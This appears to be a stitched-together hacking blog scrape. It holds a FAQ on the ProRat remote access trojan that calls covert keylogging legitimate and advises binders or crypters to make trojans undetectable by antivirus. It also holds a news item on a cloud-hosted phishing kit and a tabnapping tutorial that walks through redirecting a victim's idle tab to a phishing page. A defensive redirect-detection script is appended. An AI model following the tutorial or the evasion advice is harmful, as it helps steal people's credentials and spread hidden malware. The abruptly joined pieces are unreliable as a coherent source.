A: No. ProRat is a legal RAT. The author of ProRat created his program for legitimate purposes. For example,
there are many legal activities. Parents can use keyloggers to protect their children from online abuse etc.
Some people use it for stealing passwords, credit cards and more but it's not a software which breaks the law,
but the person who uses it.

Q: Can ProRat be used for legitimate purposes?
A: Yes. You can monitor your children's online activity to make sure they don't visit pornographic websites.
You can find out if someone uses your computer while you are away, ensure no one is accessing your personal
files while you are away and more.

Q: How do I make my server FUD?
A: You should use a binder or crypter. Also check the below links how to make trojan or keylogger fully undetectable from antivirus.

Phishing Attack With Phishing Kit | Hackers New Creativity With Phishing Attacks



A new attack has been uncovered using a phishing kit that has an indestructible infrastructure due to its residence in the cloud.

In the majority of phishing schemes when the main server is taken down the main collection point is also removed, but with this kit the data collection space is hosted separately from the phishing websites, Imperva discovered.
Once a server is taken out, all hackers need to do with the cloud-based kit is to re-post the web front end in a new location.

Imperva explained this case is also interesting for its provenance and operation.

Created by two “master hackers”, the phishing kit was posted on hacker forums. Those who used the kit then became part of the master hackers’ “army”, meaning all the data they acquired went back to the creators, who did not have to put in the hours implementing the attack.

The masters’ underlings did not know a thing about their leaders’ activities either and, depending on the country, the kit’s creators will not have broken the law as they just wrote the software.

And as each of the subsidiary hackers has their own campaign, taking down numerous domains will not affect other schemes that report back to the master hackers.

One of the overlords claimed their kit has been downloaded 200,000 times, Imperva said, but this could be an exaggeration, according to the security company’s chief technology officer Amichai Shulman.

"To some extent this is malware-as-a-service," Shulman told IT PRO, adding that the attack shows how hackers will abuse technologies people are widely using - in this case the cloud.

“This is definitely showing a shift from the normal models that we have seen so far regarding phishing,” Shulman said.

It appears hackers are getting creative with phishing attacks.

Tabnapping Attack Tutorial: Phishing Attack Tutorial



Tabnapping - Phishing in the multi-tabbed environment of browsers

This is my first post in this blog, a great opportunity for me to write in this blog. My first post is on a simple hacking trick which is phishing but in a new way. This new way of phishing is known as Tab Napping. The basic steps are the same as in a traditional phishing attack. Phishing is the most popular and widely used method for hacking email accounts. Phishing is not as easy as its name. Creating a phishing page is an easy task and anyone can download one from various hacking forums for free. The main step of phishing comes after creation of the fake login page.

How to send this fake page to the victim??

Here comes Tab Napping, which can make your second step easier than before. No need to send the fake page via email to the victim.


Tab Napping uses the modern browser's multi-tabbed environment. Nowadays people use multiple tabs for accessing Gmail, Facebook, Orkut and other websites simultaneously. The trick is to confuse the user among his/her multiple tabs and silently redirect any idle tab of the browser to your phishing page. Tab Napping works on the user's assumption that a tabbed web page stays the same when other Internet services are being accessed.

The idea behind this is very simple and is done with JavaScript. Tab napping is all about the relation between two pages, say Page A and Page B. The victim was viewing Page A in a browser tab, then left it idle and is now using some other website in another tab. If the user does not return to Page A for some pre-specified time, Page A automatically redirects to Page B. This Page B is your phishing page. This redirection and the checking for user actions are done by JavaScript. You can download it from the given link.

Make a web page and use the tab napping script in that page; call it Page A. This script will not affect the layout or content of the page. This script will check for user actions. If the page is idle for some time, this script will redirect this page to a pre-specified page which may be your phishing page. You have to specify this page in the script. Be sure to change this in the script.
Check the script for this line...

timerRedirect = setInterval("location.href='http://www.gmail.com'",10000);

This line will redirect to Gmail after 10 sec. Change this location to the address of your phishing page. This line is used 2 times in the script, so change it in both lines.

So Page A with the tab napping script will redirect to phishing Page B.

Now send the link of the page A to your victim. This is a normal page. If the page is idle for some time it will be changed to page B otherwise no effect.
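
The timed redirect described above is something a reviewer can look for in a page's scripts. The following is an added example, not the script this post links to: a static heuristic that finds `setInterval`/`setTimeout` calls whose callback navigates the page and reports whether the target is on another origin. `PAGE_URL` and the sample script are constructed; the first sample line is the one quoted in the post.

```javascript
// Added example (not the script the post links to): static heuristic that
// finds timer-driven navigations, the mechanism described above.
const TIMER = /\b(setInterval|setTimeout)\s*\(([\s\S]{0,400}?),\s*(\d+)\s*\)/g;
const NAV = /location(?:\.href)?\s*=\s*(['"])(.*?)\1|location\.(?:replace|assign)\s*\(\s*(['"])(.*?)\3/;
// Handlers a page can use to tell whether the user is still looking at it.
const ACTIVITY = /\b(?:onblur|onfocus|onmousemove|onkeydown|visibilitychange)\b/;

// Constructed sample: the timer line quoted in the post plus a harmless
// same-site timer. PAGE_URL is a placeholder for the page being reviewed.
const PAGE_URL = 'http://pagea.example/index.html';
const SAMPLE_SCRIPT = `
timerRedirect = setInterval("location.href='http://www.gmail.com'",10000);
setTimeout(function () { location.href = '/news/latest'; }, 3000);
`;

function findTimedRedirects(source, pageUrl) {
  const pageOrigin = new URL(pageUrl).origin;
  const watchesUser = ACTIVITY.test(source);
  const findings = [];
  for (const m of source.matchAll(TIMER)) {
    const nav = NAV.exec(m[2]);
    if (!nav) continue;                            // timer does not navigate
    let target;
    try {
      target = new URL(nav[2] ?? nav[4], pageUrl); // resolve relative targets
    } catch {
      continue;                                    // not a literal URL
    }
    findings.push({
      timer: m[1],
      delayMs: Number(m[3]),
      target: target.href,
      crossOrigin: target.origin !== pageOrigin,
      watchesUser,
    });
  }
  return findings;
}

// A timed jump to another origin is the pattern worth a manual look.
function suspiciousRedirects(source, pageUrl) {
  return findTimedRedirects(source, pageUrl).filter((f) => f.crossOrigin);
}

console.log(suspiciousRedirects(SAMPLE_SCRIPT, PAGE_URL));
```

Because it only reads literal URLs inside the timer call, a target assembled at runtime will not be reported and still needs manual review.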

Download Here: